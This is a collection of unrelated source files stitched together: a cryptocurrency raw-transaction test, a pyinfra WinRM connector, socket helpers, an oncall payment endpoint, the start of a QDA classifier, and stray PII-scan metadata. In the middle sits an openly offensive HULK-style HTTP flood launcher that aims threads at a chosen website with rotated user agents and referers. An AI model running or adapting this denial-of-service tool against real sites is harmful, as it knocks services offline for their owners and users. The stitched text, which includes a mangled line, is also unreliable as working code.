self.sync_all()
# getrawtransaction tests
# 1. valid parameters - only supply txid
assert_equal(self.nodes[0].getrawtransaction(txId), rawTxSigned['hex'])
# 2. valid parameters - supply txid and 0 for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, 0), rawTxSigned['hex'])
# 3. valid parameters - supply txid and False for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, False), rawTxSigned['hex'])
# 4. valid parameters - supply txid and 1 for verbose.
# We only check the ""hex"" field of the output so we don't need to update this test every time the output format changes.
assert_equal(self.nodes[0].getrawtransaction(txId, 1)[""hex""], rawTxSigned['hex'])
# 5. valid parameters - supply txid and True for verbose
assert_equal(self.nodes[0].getrawtransaction(txId, True)[""hex""], rawTxSigned['hex'])
# 6. invalid parameters - supply txid and string ""Flase""
assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, ""Flase"")
# 7. invalid parameters - supply txid and empty array
assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, [])
# 8. invalid parameters - supply txid and empty dict
assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, {})
inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : 1000}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 1000)
# 9. invalid parameters - sequence number out of range
inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : -1}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
# 10. invalid parameters - sequence number out of range
inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : 4294967296}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1, 'sequence' : 4294967294}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 4294967294)
####################################
# TRANSACTION VERSION NUMBER TESTS #
####################################
# Test the minimum transaction version number that fits in a signed 32-bit integer.
# As transaction version is unsigned, this should convert to its unsigned equivalent.
tx = CTransaction()
tx.nVersion = -0x80000000
rawtx = ToHex(tx)
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x80000000)
# Test the maximum transaction version number that fits in a signed 32-bit integer.
tx = CTransaction()
tx.nVersion = 0x7fffffff
rawtx = ToHex(tx)
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x7fffffff)
self.log.info('sendrawtransaction/testmempoolaccept with maxfeerate')
# Test a transaction with a small fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{ ""txid"" : txId, ""vout"" : vout['n'] }]
# Fee 10,000 satoshis, (1 - (10000 sat * 0.00000001 SYS/sat)) = 0.9999
outputs = { self.nodes[0].getnewaddress() : Decimal(""0.99990000"") }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 10,000 satoshis, ~100 b transaction, fee rate should land around 100 sat/byte = 0.00100000 SYS/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']], 0.00001000)[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex'], 0.00001000)
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'])
# Test a transaction with a large fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{ ""txid"" : txId, ""vout"" : vout['n'] }]
# Fee 2,000,000 satoshis, (1 - (2000000 sat * 0.00000001 SYS/sat)) = 0.98
outputs = { self.nodes[0].getnewaddress() : Decimal(""0.98000000"") }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 2,000,000 satoshis, ~100 b transaction, fee rate should land around 20,000 sat/byte = 0.20000000 SYS/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex'])
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']], maxfeerate='0.20000000')[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'], maxfeerate='0.20000000')
if __name__ == '__main__':
RawTransactionsTest().main()
",28831,"[['MEDICAL_LICENSE', 'ZZ0000000'], ['MEDICAL_LICENSE', 'ZZ0000000'], ['DATE_TIME', '2014-2020'], ['NRP', 'OrderedDict'], ['PERSON', 'Constructed'], ['PERSON', 'json'], ['PERSON', 'json'], ['LOCATION', 'json'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'address2'], ['PERSON', 'locktime'], ['PERSON', 'locktime'], ['PERSON', 'address2'], ['PERSON', 'address2'], ['PERSON', 'tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress'], ['PERSON', 'self.sync_all'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['PERSON', 'mSigObj = self.nodes[2].addmultisigaddress(2'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['LOCATION', 'addr.'], ['PERSON', 'addr3'], ['PERSON', 'addr1Obj = self.nodes[1].getaddressinfo(addr1'], ['PERSON', 'addr3Obj'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'addr1Obj = self.nodes[1].getaddressinfo(addr1'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['URL', 'https://github.com/bitcoin/bitcoin/issues/20579'], ['URL', 'framework.me'], ['URL', 'self.se'], ['URL', 'self.nu'], ['URL', 'self.su'], ['URL', 'self.sk'], ['URL', 'self.co'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.options.de'], ['URL', 'self.no'], ['URL', 
'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no']]"
77,"from __future__ import print_function, unicode_literals
import base64
import ntpath
import click
from pyinfra import logger
from pyinfra.api import Config
from pyinfra.api.exceptions import ConnectError, PyinfraError
from pyinfra.api.util import get_file_io, memoize, sha1_hash
from .pyinfrawinrmsession import PyinfraWinrmSession
from .util import make_win_command
def _raise_connect_error(host, message, data):
message = '{0} ({1})'.format(message, data)
raise ConnectError(message)
@memoize
def show_warning():
logger.warning('The @winrm connector is alpha!')
def _make_winrm_kwargs(state, host):
kwargs = {
}
for key, value in (
('username', host.data.winrm_user),
('password', host.data.winrm_password),
('winrm_port', int(host.data.winrm_port or 0)),
('winrm_transport', host.data.winrm_transport or 'plaintext'),
('winrm_read_timeout_sec', host.data.winrm_read_timeout_sec or 30),
('winrm_operation_timeout_sec', host.data.winrm_operation_timeout_sec or 20),
):
if value:
kwargs[key] = value
# FUTURE: add more auth
# pywinrm supports: basic, certificate, ntlm, kerberos, plaintext, ssl, credssp
# see https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12
return kwargs
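# Example of the mapping above, assuming hypothetical inventory data of
# winrm_user='admin', winrm_password='secret' and winrm_port=5986 (and
# nothing else set):
#
#     {'username': 'admin', 'password': 'secret', 'winrm_port': 5986,
#      'winrm_transport': 'plaintext',
#      'winrm_read_timeout_sec': 30, 'winrm_operation_timeout_sec': 20}
#
# Falsy values (e.g. an unset winrm_port coerced to 0) are dropped entirely.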
def make_names_data(hostname):
show_warning()
yield dummy@email.com(hostname), {'winrm_hostname': hostname}, []
def connect(state, host):
'''
Connect to a single host. Returns the winrm Session if successful.
'''
kwargs = _make_winrm_kwargs(state, host)
logger.debug('Connecting to: %s (%s)', host.name, kwargs)
# Hostname can be provided via winrm config (alias), data, or the hosts name
hostname = kwargs.pop(
'hostname',
host.data.winrm_hostname or host.name,
)
try:
# Create new session
host_and_port = '{}:{}'.format(hostname, host.data.winrm_port)
logger.debug('host_and_port: %s', host_and_port)
session = PyinfraWinrmSession(
host_and_port,
auth=(
kwargs['username'],
kwargs['password'],
),
transport=kwargs['winrm_transport'],
read_timeout_sec=kwargs['winrm_read_timeout_sec'],
operation_timeout_sec=kwargs['winrm_operation_timeout_sec'],
)
return session
# TODO: add exceptions here
except Exception as e:
auth_kwargs = {}
for key, value in kwargs.items():
if key in ('username', 'password'):
auth_kwargs[key] = value
auth_args = ', '.join(
'{0}={1}'.format(key, value)
for key, value in auth_kwargs.items()
)
logger.debug('%s', e)
_raise_connect_error(host, 'Authentication error', auth_args)
def run_shell_command(
state, host, command,
env=None,
success_exit_codes=None,
print_output=False,
print_input=False,
return_combined_output=False,
shell_executable=Config.SHELL,
**ignored_command_kwargs
):
'''
Execute a command on the specified host.
Args:
state (``pyinfra.api.State`` obj): state object for this command
hostname (string): hostname of the target
command (string): actual command to execute
success_exit_codes (list): all values in the list that will return success
print_output (boolean): print the output
print_input (boolean): print the input
return_combined_output (boolean): combine the stdout and stderr lists
shell_executable (string): shell to use - 'cmd'=cmd, 'ps'=powershell (default)
env (dict): environment variables to set
Returns:
tuple: (exit_code, stdout, stderr)
stdout and stderr are both lists of strings from each buffer.
'''
command = make_win_command(command)
logger.debug('Running command on %s: %s', host.name, command)
if print_input:
click.echo('{0}>>> {1}'.format(host.print_prefix, command), err=True)
# get rid of leading/trailing quote
tmp_command = command.strip(""'"")
if print_output:
click.echo(
'{0}>>> {1}'.format(host.print_prefix, command),
err=True,
)
if not shell_executable:
shell_executable = 'ps'
logger.debug('shell_executable:%s', shell_executable)
# we use our own subclassed session that allows for env setting from open_shell.
if shell_executable in ['cmd']:
response = host.connection.run_cmd(tmp_command, env=env)
else:
response = host.connection.run_ps(tmp_command, env=env)
return_code = response.status_code
logger.debug('response:%s', response)
std_out_str = response.std_out.decode('utf-8')
std_err_str = response.std_err.decode('utf-8')
# split on '\r\n' (windows newlines)
std_out = std_out_str.split('\r\n')
std_err = std_err_str.split('\r\n')
logger.debug('std_out:%s', std_out)
logger.debug('std_err:%s', std_err)
if print_output:
click.echo(
'{0}>>> {1}'.format(host.print_prefix, '\n'.join(std_out)),
err=True,
)
if success_exit_codes:
status = return_code in success_exit_codes
else:
status = return_code == 0
logger.debug('Command exit status: %s', status)
if return_combined_output:
std_out = [('stdout', line) for line in std_out]
std_err = [('stderr', line) for line in std_err]
return status, std_out + std_err
return status, std_out, std_err
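# Usage sketch (state and host come from pyinfra's runtime; 'ps' is the
# default shell selected above):
#
#     status, std_out, std_err = run_shell_command(
#         state, host, 'Get-ChildItem C:\\temp', print_output=True)
#     if not status:
#         ...inspect std_err and handle the failure...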
def get_file(
state, host, remote_filename, filename_or_io,
**command_kwargs
):
raise PyinfraError('Not implemented')
def _put_file(state, host, filename_or_io, remote_location, chunk_size=2048):
# this should work fine on smallish files, but there will be perf issues
# on larger files both due to the full read, the base64 encoding, and
# the latency when sending chunks
with get_file_io(filename_or_io) as file_io:
data = file_io.read()
for i in range(0, len(data), chunk_size):
chunk = data[i:i + chunk_size]
ps = (
'$data = [System.Convert]::FromBase64String(""{0}""); '
'{1} -Value $data -Encoding byte -Path ""{2}""'
).format(
base64.b64encode(chunk).decode('utf-8'),
'Set-Content' if i == 0 else 'Add-Content',
remote_location)
status, _stdout, stderr = run_shell_command(state, host, ps)
if status is False:
logger.error('File upload error: {0}'.format('\n'.join(stderr)))
return False
return True
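# Worked example of the chunking above: a 5000-byte file with chunk_size=2048
# becomes three PowerShell calls -- Set-Content for bytes 0..2047, then
# Add-Content for 2048..4095 and 4096..4999 -- each embedding its chunk
# base64-encoded inline in the command.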
def put_file(
state, host, filename_or_io, remote_filename,
print_output=False, print_input=False,
**command_kwargs
):
'''
Upload file by chunking and sending base64 encoded via winrm
'''
# Always use temp file here in case of failure
temp_file = ntpath.join(
host.fact.windows_temp_dir(),
'pyinfra-{0}'.format(sha1_hash(remote_filename)),
)
if not _put_file(state, host, filename_or_io, temp_file):
return False
# Execute run_shell_command w/sudo and/or su_user
command = 'Move-Item -Path {0} -Destination {1} -Force'.format(temp_file, remote_filename)
status, _, stderr = run_shell_command(
state, host, command,
print_output=print_output,
print_input=print_input,
**command_kwargs
)
if status is False:
logger.error('File upload error: {0}'.format('\n'.join(stderr)))
return False
if print_output:
click.echo(
'{0}file uploaded: {1}'.format(host.print_prefix, remote_filename),
err=True,
)
return True
EXECUTION_CONNECTOR = True
#
# (C) Copyright 2011 Jacek Konieczny dummy@email.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License Version
# 2.1 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
# pylint: disable-msg=W0201
"""Utility functions to wait until a socket (or object implementing .fileno()
in POSIX) is ready for input or output."""
from __future__ import absolute_import, division
__docformat__ = "restructuredtext en"
import select
if hasattr(select, "poll"):
def wait_for_read(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for reading.
"""
if timeout is not None:
timeout *= 1000
poll = select.poll()
poll.register(socket, select.POLLIN)
events = poll.poll(timeout)
return bool(events)
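# Illustrative usage sketch (POSIX only; assumes socket.socketpair is
# available): a socket becomes readable once its peer has written, so
# wait_for_read() times out before the write and succeeds after it.
def _demo_wait_for_read():
    import socket
    a, b = socket.socketpair()
    try:
        assert not wait_for_read(a, 0.1)  # nothing buffered yet, times out
        b.sendall(b'ping')
        assert wait_for_read(a, 1.0)      # data is now pending
    finally:
        a.close()
        b.close()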
def wait_for_write(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for writing.
"""
if timeout is not None:
timeout *= 1000
poll = select.poll()
poll.register(socket, select.POLLOUT)
events = poll.poll(timeout)
return bool(events)
else:
def wait_for_read(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for reading.
"""
readable = select.select([socket], [], [], timeout)[0]
return bool(readable)
def wait_for_write(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for writing.
"""
writable = select.select([], [socket], [], timeout)[1]
return bool(writable)
"""
HTTP UNBEARABLE LOAD QUEEN
A HULK EDIT BY @OBN0XIOUS
THE ORIGINAL MAKER OF HULK, PLEASE GO BACK TO CODECADEMY
"""
import sys
import argparse
import random
from threading import Thread
import hulqThreading
import hulqRequest
parser = argparse.ArgumentParser()
parser.add_argument('--threads', '-t', default=2, help='Choose how many threads.')
parser.add_argument('--website', '-w', help='Website you are attacking.')
systemArguments = parser.parse_args()
if not systemArguments.website:
sys.exit("Provide -w or --website.")
userAgents = \
(
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:127.0.0.1 Gecko/20090913 Firefox/3.5.3', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729', \
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:127.0.0.1 Gecko/20090718 Firefox/3.5.1', \
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US AppleWebKit/532.1 (KHTML, like Gecko Chrome/4.0.219.6 Safari/532.1', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2', \
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US', \
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP', \
'Opera/9.80 (Windows NT 5.2; U; ru Presto/2.5.22 Version/10.51'
)
referers = \
(
'http://www.google.com/?q=', \
'http://www.usatoday.com/search/results?q=', \
'http://engadget.search.aol.com/search?q='
)
for i in range(0, int(systemArguments.threads)):
referer = random.choice(referers)
userAgent = random.choice(userAgents)
t1 = Thread(target = hulqRequest.httpAttackRequest, args = (systemArguments.website, userAgent, referer))
t1.start()
# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
import json
import time
from .events import on_get as get_events
from collections import defaultdict
import requests
from ujson import dumps as json_dumps
from falcon import HTTPStatus, HTTP_200
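# Illustrative client-side sketch (hypothetical host name): how the endpoint
# served by PaidEvents.on_get below might be queried, using the documented
# filter parameters to fetch future primary on-call events for one team.
def _demo_query_paid_events():
    params = {'team': 'foo-sre', 'role': 'primary', 'start__gt': int(time.time())}
    resp = requests.get('http://oncall.example.com/api/v0/oncall_events', params=params)
    return resp.json()  # {'ldap_user_id': [event, ...], ...}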
class PaidEvents(object):
def __init__(self, config):
self.config = config
def on_get(self, req, resp):
"""
Search for events. Allows filtering based on a number of parameters,
detailed below. Also returns only the users who are paid to be on call. Uses response from
oncall-bonus to identify paid status.
**Example request**:
.. sourcecode:: http
GET /api/v0/oncall_events?team=foo-sre&end__gt=1487466146&role=primary HTTP/1.1
Host: example.com
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"ldap_user_id":
[
{
"start": 1488441600,
"end": 1489132800,
"team": "foo-sre",
"link_id": null,
"schedule_id": null,
"role": "primary",
"user": "foo",
"full_name": "Foo Icecream",
"id": 187795
},
{
"start": 1488441600,
"end": 1489132800,
"team": "foo-sre",
"link_id": "PI:KEY",
"schedule_id": 123,
"role": "primary",
"user": "bar",
"full_name": "Bar Apple",
"id": 187795
}
]
}
:query team: team name
:query user: user name
:query role: role name
:query id: id of the event
:query start: start time (unix timestamp) of event
:query end: end time (unix timestamp) of event
:query start__gt: start time (unix timestamp) greater than
:query start__ge: start time (unix timestamp) greater than or equal
:query start__lt: start time (unix timestamp) less than
:query start__le: start time (unix timestamp) less than or equal
:query end__gt: end time (unix timestamp) greater than
:query end__ge: end time (unix timestamp) greater than or equal
:query end__lt: end time (unix timestamp) less than
:query end__le: end time (unix timestamp) less than or equal
:query role__eq: role name
:query role__contains: role name contains param
:query role__startswith: role name starts with param
:query role__endswith: role name ends with param
:query team__eq: team name
:query team__contains: team name contains param
:query team__startswith: team name starts with param
:query team__endswith: team name ends with param
:query team_id: team id
:query user__eq: user name
:query user__contains: user name contains param
:query user__startswith: user name starts with param
:query user__endswith: user name ends with param
:statuscode 200: no error
:statuscode 400: bad request
"""
config = self.config
oncall_bonus_blacklist = config.get('bonus_blacklist', [])
oncall_bonus_whitelist = config.get('bonus_whitelist', [])
bonus_url = config.get('bonus_url', None)
ldap_grouping = defaultdict(list)
# if start time is not specified only fetch events in the future
if not req.params.get('start__gt'):
req.params['start__gt'] = str(int(time.time()))
get_events(req, resp)
# fetch team data from an external oncall-bonus api
try:
bonus_response = requests.get(bonus_url)
bonus_response.raise_for_status()
except requests.exceptions.RequestException:
raise HTTPStatus('503 failed to contact oncall-bonus API')
oncall_bonus_teams = bonus_response.json()
for event in json.loads(resp.body):
if event['role'].lower() == 'manager':
continue
team = event['team']
if team in oncall_bonus_whitelist:
ldap_grouping[event['user']].append(event)
continue
if team in oncall_bonus_blacklist:
continue
# check if the event's role is paid for that team
team_payment_details = next((item for item in oncall_bonus_teams if item.get('name', '') == team), None)
if team_payment_details:
team_paid_roles = {'primary': team_payment_details.get('primary_paid', 0), 'secondary': team_payment_details.get('secondary_paid', 0)}
if team_paid_roles.get(event['role']):
ldap_grouping[event['user']].append(event)
resp.status = HTTP_200
resp.body = json_dumps(ldap_grouping)
"""
Quadratic Discriminant Analysis
"""
# Author: Matthieu Perrot dummy@email.com
#
# License: BSD Style.
import warnings
import numpy as np
import scipy.ndimage as ndimage
from .base import BaseEstimator, ClassifierMixin
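# Illustrative check for the QDA class defined below (uses only numpy): the
# per-class SVD in `fit` reproduces the empirical covariance matrix,
# cov = V * (S^2 / (n - 1)) * V.T, and predict_proba rows sum to one.
def _demo_qda_internals():
    rng = np.random.RandomState(0)
    Xg = rng.randn(20, 3)
    Xgc = Xg - Xg.mean(0)
    U, S, Vt = np.linalg.svd(Xgc, full_matrices=False)
    cov_svd = np.dot((S ** 2 / (len(Xg) - 1)) * Vt.T, Vt)
    assert np.allclose(cov_svd, np.cov(Xg, rowvar=False))
    # posterior probabilities are normalized per sample
    X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
    y = np.array([1, 1, 1, 2, 2, 2])
    proba = QDA().fit(X, y).predict_proba(X)
    assert np.allclose(proba.sum(axis=1), 1.0)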
# FIXME :
# - in fit(X, y) method, many checks are common with other models
# (in particular LDA model) and should be factorized:
# maybe in BaseEstimator ?
class QDA(BaseEstimator, ClassifierMixin):
"""
Quadratic Discriminant Analysis (QDA)
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array, shape = [n_samples]
Target vector relative to X
priors : array, optional, shape = [n_classes]
Priors on classes
Attributes
----------
`means_` : array-like, shape = [n_classes, n_features]
Class means
`priors_` : array-like, shape = [n_classes]
Class priors (sum to 1)
`covariances_` : list of array-like, shape = [n_features, n_features]
Covariance matrices of each class
Examples
--------
>>> from sklearn.qda import QDA
>>> import numpy as np
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> y = np.array([1, 1, 1, 2, 2, 2])
>>> clf = QDA()
>>> clf.fit(X, y)
QDA(priors=None)
>>> print clf.predict([[-0.8, -1]])
[1]
See also
--------
LDA
"""
def __init__(self, priors=None):
self.priors = np.asarray(priors) if priors is not None else None
def fit(self, X, y, store_covariances=False, tol=1.0e-4):
"""
Fit the QDA model according to the given training data and parameters.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array, shape = [n_samples]
